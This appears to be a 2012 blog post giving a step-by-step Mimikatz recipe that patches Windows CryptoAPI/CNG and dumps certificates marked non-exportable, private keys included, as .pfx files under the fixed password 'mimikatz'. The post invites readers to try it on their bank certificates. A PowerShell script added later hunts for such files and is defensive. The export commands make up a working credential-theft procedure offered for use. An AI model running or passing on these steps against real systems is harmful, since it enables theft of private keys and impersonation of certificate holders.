Sunday, January 22, 2012

Export (supposedly) non-exportable Certificates

Today I'll explain how to export (supposedly) non-exportable certificates in Windows. Mimikatz is a crafty tool that can export ANY certificate. Yes, you can export even your personal bank certificate, and it won't ask you for a password. It makes you wonder how safe you really are. All you need is administrative rights, and it works on Windows Vista/7!

First of all, download the archive containing the tool (the latest release is in the trunk). Get it here: http://blog.gentilkiwi.com/mimikatz

Extract the contents, open either the Win32 or the x64 folder (depending on whether your OS is 32-bit or 64-bit) and run mimikatz.exe.

1) A command prompt will appear, and there you need to type:
privilege::debug

2) Afterwards type this:
crypto::patchcng

2b) If you get errors, try this instead:
crypto::patchcapi

3) And the last step:
crypto::exportCertificates

3b) Again, if you get errors, try this one:
crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE

Your certificate(s) should now be dumped to your Documents folder. They are saved as .pfx files protected with the password "mimikatz". That is the password you will need to enter when you import them on any computer.
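The fixed password also gives defenders something to hunt for: any .pfx file that opens with "mimikatz" is worth a close look. The PowerShell script below is an added example, not part of the original post or of Mimikatz; the helper name Test-PfxPassword and the default search root (the current user's Documents folder) are assumptions.

```powershell
# Added example, not from the original post or from Mimikatz.
# Finds .pfx files that open with the fixed password the post mentions.
# Assumptions: Test-PfxPassword is a hypothetical helper name; the search
# root defaults to the current user's Documents folder.
param(
    [string]$Root = [Environment]::GetFolderPath('MyDocuments'),
    [string]$Password = 'mimikatz'
)

function Test-PfxPassword {
    param([string]$Path, [string]$Password)

    $certs = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2Collection
    # PersistKeySet is deliberately not set, so keys loaded for this check
    # are not meant to stay in the key store after Reset().
    $flags = [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::DefaultKeySet
    try {
        $certs.Import($Path, $Password, $flags)
        $written = (Get-Item -LiteralPath $Path).LastWriteTime
        foreach ($cert in $certs) {
            [pscustomobject]@{
                File          = $Path
                FileWritten   = $written
                Subject       = $cert.Subject
                Thumbprint    = $cert.Thumbprint
                HasPrivateKey = $cert.HasPrivateKey
                NotAfter      = $cert.NotAfter
            }
        }
    }
    catch [System.Security.Cryptography.CryptographicException] {
        # Wrong password or not a valid PKCS#12 file: no finding for this file.
    }
    finally {
        foreach ($cert in $certs) { $cert.Reset() }
    }
}

Get-ChildItem -Path $Root -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -eq '.pfx' } |
    ForEach-Object { Test-PfxPassword -Path $_.FullName -Password $Password }
```

A hit with HasPrivateKey set to True means a private key is sitting on disk under a publicly known password; treat that certificate as compromised and have it revoked and reissued.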

Enjoy, and remember not to use this for malicious purposes :P
